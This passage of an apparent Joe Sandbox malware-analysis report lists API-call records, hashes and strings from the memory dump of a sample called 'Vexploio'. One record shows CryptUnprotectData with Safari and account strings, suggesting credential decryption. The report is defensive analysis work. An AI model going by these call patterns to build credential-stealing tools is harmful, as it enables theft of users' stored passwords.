                              • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??3@
                              • String ID:
                              • API String ID: 613200358-0
                              • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                              • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                              • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                              • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                              APIs
                              • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: FreeLibrary
                              • String ID:
                              • API String ID: 3664257935-0
                              • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                              • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                              • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                              • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                              APIs
                              • EnumResourceNamesW.KERNELBASE(?,?,004148B6,00000000), ref: 0041494B
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: EnumNamesResource
                              • String ID:
                              • API String ID: 3334572018-0
                              • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                              • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                              • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                              • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                              APIs
                              • FreeLibrary.KERNELBASE(00000000), ref: 0044DEB6
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: FreeLibrary
                              • String ID:
                              • API String ID: 3664257935-0
                              • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                              • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                              • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                              • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                              APIs
                              • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: CloseFind
                              • String ID:
                              • API String ID: 1863332320-0
                              • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                              • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                              • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                              • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                              APIs
                              • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: Open
                              • String ID:
                              • API String ID: 71445658-0
                              • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                              • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                              • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                              • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                              APIs
                              • GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: AttributesFile
                              • String ID:
                              • API String ID: 3188754299-0
                              • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                              • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                              • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                              • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??3@
                              • String ID:
                              • API String ID: 613200358-0
                              • Opcode ID: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                              • Instruction ID: 5e082493cfe38c59748d9de5a46a99a47989c0e105afa31b953e1adb18ef7a34
                              • Opcode Fuzzy Hash: 908a2f96169ffd3f5635234353574390e30f5bbba8146f1a6a93cc8e14f9cc97
                              • Instruction Fuzzy Hash: 17900282455501105C0425755C06505110808A313A376074A7032955D1CE188060601D
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                              • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                              • Opcode Fuzzy Hash: b24af7433d330108988894de74f75be26998b58131ab4cc11d8f9b1f19dcffda
                              • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                              APIs
                              • memset.MSVCRT ref: 004095FC
                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                • Part of subcall function 004091B8: memcpy.MSVCRT ref: 004092C9
                                • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                              • String ID:
                              • API String ID: 3655998216-0
                              • Opcode ID: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                              • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                              • Opcode Fuzzy Hash: 06dd2208bba870b09ae4b6a35152530ffce6bfcddb3583e774ca40d5f9d70baf
                              • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                              APIs
                              • memset.MSVCRT ref: 00445426
                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                              • String ID:
                              • API String ID: 1828521557-0
                              • Opcode ID: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                              • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                              • Opcode Fuzzy Hash: 30388877fc1f1466cb5fc4dbbd946ecf0cc3df28c932be715bfff3731eba89eb
                              • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                              APIs
                                • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                • Part of subcall function 004062A6: SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
                              • memcpy.MSVCRT ref: 00406942
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??2@FilePointermemcpy
                              • String ID:
                              • API String ID: 609303285-0
                              • Opcode ID: ff2b83ec1290d704cc9ef70c9b0cd29b753561e2494ca983cce7aef5439f8322
                              • Instruction ID: a147fa8ec668463fbbadbca9a08a444fcb23aa95a0ceadfc627c4072e562ebd5
                              • Opcode Fuzzy Hash: ff2b83ec1290d704cc9ef70c9b0cd29b753561e2494ca983cce7aef5439f8322
                              • Instruction Fuzzy Hash: 4B11A7B2500108BBDB11A755C840F9F77ADDF85318F16807AF90677281C778AE2687A9
                              APIs
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: _wcsicmp
                              • String ID:
                              • API String ID: 2081463915-0
                              • Opcode ID: d19f359b0b47db267e5fce9c2c3eaec783a9e0147a5c7e9f99ecd470ce03f4be
                              • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                              • Opcode Fuzzy Hash: d19f359b0b47db267e5fce9c2c3eaec783a9e0147a5c7e9f99ecd470ce03f4be
                              • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                              APIs
                                • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                              • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: File$CloseCreateErrorHandleLastRead
                              • String ID:
                              • API String ID: 2136311172-0
                              • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                              • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                              • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                              • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                              APIs
                                • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT ref: 0040B052
                              • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??2@??3@
                              • String ID:
                              • API String ID: 1936579350-0
                              • Opcode ID: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                              • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                              • Opcode Fuzzy Hash: b7d64a9db0ab8f7e7b6c625ee8b1c93a5659d73149cb5b89327274070e360fa5
                              • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                              APIs
                              • EmptyClipboard.USER32 ref: 004098EC
                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                              • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                              • GlobalFix.KERNEL32(00000000), ref: 00409927
                              • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                              • GlobalUnWire.KERNEL32(00000000), ref: 0040994C
                              • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                              • GetLastError.KERNEL32 ref: 0040995D
                              • CloseHandle.KERNEL32(?), ref: 00409969
                              • GetLastError.KERNEL32 ref: 00409974
                              • CloseClipboard.USER32 ref: 0040997D
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleReadSizeWire
                              • String ID:
                              • API String ID: 2565263379-0
                              • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                              • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                              • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                              • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                              APIs
                              • EmptyClipboard.USER32 ref: 00409882
                              • wcslen.MSVCRT ref: 0040988F
                              • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                              • GlobalFix.KERNEL32(00000000), ref: 004098AC
                              • memcpy.MSVCRT ref: 004098B5
                              • GlobalUnWire.KERNEL32(00000000), ref: 004098BE
                              • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                              • CloseClipboard.USER32 ref: 004098D7
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ClipboardGlobal$AllocCloseDataEmptyWirememcpywcslen
                              • String ID:
                              • API String ID: 2014503067-0
                              • Opcode ID: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                              • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                              • Opcode Fuzzy Hash: 2c7da0a1169fa3e148b60bfefcefaa8efe46c1682b98611cbf8cde0c6b7c4e2a
                              • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                              APIs
                              • GetLastError.KERNEL32 ref: 004182D7
                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                              • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                              • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                              • LocalFree.KERNEL32(?), ref: 00418342
                              • ??3@YAXPAX@Z.MSVCRT ref: 00418370
                                • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7618DF80,?,0041755F,?), ref: 00417452
                                • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: FormatMessage$??3@ByteCharErrorFreeLastLocalMultiVersionWidemalloc
                              • String ID: OsError 0x%x (%u)
                              • API String ID: 403622227-2664311388
                              • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                              • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
                              • Opcode Fuzzy Hash: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                              • Instruction Fuzzy Hash: 6011B634901128FBCB11ABE2DC49CDF7F78FF85B54B10405AF811A2251DB754A81D7A9
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: ??2@??3@memcpymemset
                              • String ID:
                              • API String ID: 1865533344-0
                              • Opcode ID: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                              • Instruction ID: 142cde259e2f0f6626273334703b570cf32d48e622dac596d848113b95f58250
                              • Opcode Fuzzy Hash: 0071396e032f76671cb9f6bfe1f2b1364741fc1e38965bf138fca73b5b698f56
                              • Instruction Fuzzy Hash: D7113C71900209EFDF10AF95C805AAE3B71FF09325F04C16AFD15662A1C7798E21EF5A
                              APIs
                              • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: NtdllProc_Window
                              • String ID:
                              • API String ID: 4255912815-0
                              • Opcode ID: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                              • Instruction ID: 27e4c09127093a565ccbabfb03fa630377511b1425115cef73ae3fc8c8acf6c4
                              • Opcode Fuzzy Hash: 3de349333402391b5f3bd83c09a178b3b388cc2d8cda5cc5e9d51b86f8a07b54
                              • Instruction Fuzzy Hash: BEC0483A108200FFCA024B81DD08D0ABFA2BB98320F00C868B2AC0403187338022EB02
                              APIs
                              • _wcsicmp.MSVCRT ref: 004022A6
                              • _wcsicmp.MSVCRT ref: 004022D7
                              • _wcsicmp.MSVCRT ref: 00402305
                              • _wcsicmp.MSVCRT ref: 00402333
                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                • Part of subcall function 0040AA29: memcpy.MSVCRT ref: 0040AA5B
                              • memset.MSVCRT ref: 0040265F
                              • memcpy.MSVCRT ref: 0040269B
                                • Part of subcall function 00404423: GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                • Part of subcall function 00404423: FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                • Part of subcall function 00404423: CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                              • memcpy.MSVCRT ref: 004026FF
                              • LocalFree.KERNEL32(?,?,?,00000000,?,?,00000000,?), ref: 00402764
                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?), ref: 00402775
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
                              • API ID: _wcsicmp$Freememcpy$Library$AddressCryptDataLocalProcUnprotectmemsetwcslen
                              • String ID: !$#$$$&$&$'$)$/$0$2$8$=$>$>$@$A$Account$Data$F$H$H$I$K$K$L$O$Path$S$X$\$^$`$a$b$com.apple.Safari$com.apple.WebKit2WebProcess$g$h$n$n$q$server$t$t$t$u$u$w$y$y$z${$}$~
                              • API String ID: 2929817778-1134094380
                              • Opcode ID: 6a9a7dcbd14ffa51df405e1a5867c443e070cad0e5c800a91192ec5c53283d41
                              • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                              • Opcode Fuzzy Hash: 6a9a7dcbd14ffa51df405e1a5867c443e070cad0e5c800a91192ec5c53283d41
                              • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 0000000B.00000002.178593188930.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 0000000B.00000002.178593188930.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                              • Associated: 0000000B.00000002.178593188930.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_400000_Vexploio.jbxd
                              Similarity
